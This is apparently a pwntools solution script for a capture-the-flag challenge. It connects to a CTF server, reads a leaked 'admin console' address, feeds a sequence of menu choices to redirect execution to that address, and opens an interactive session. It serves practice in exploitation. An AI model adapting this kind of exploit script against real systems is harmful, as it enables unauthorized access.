from pwn import *
conn = remote('chal.fallctf.com', 5001)
# conn = process('./challenge')
conn.sendline(b'4')
conn.sendline(b'1')
conn.recvuntil(b'admin console, Address: ')
console_address = int(conn.recvline()[:-1], 16)
conn.sendline(b'3')
conn.sendline(b'0')
conn.sendline(b'0')
conn.sendline(b'3')
conn.sendline(b'1')
conn.sendline(b'0')
conn.sendline(hex(console_address).encode('ascii'))
conn.sendline(b'0')
conn.interactive()
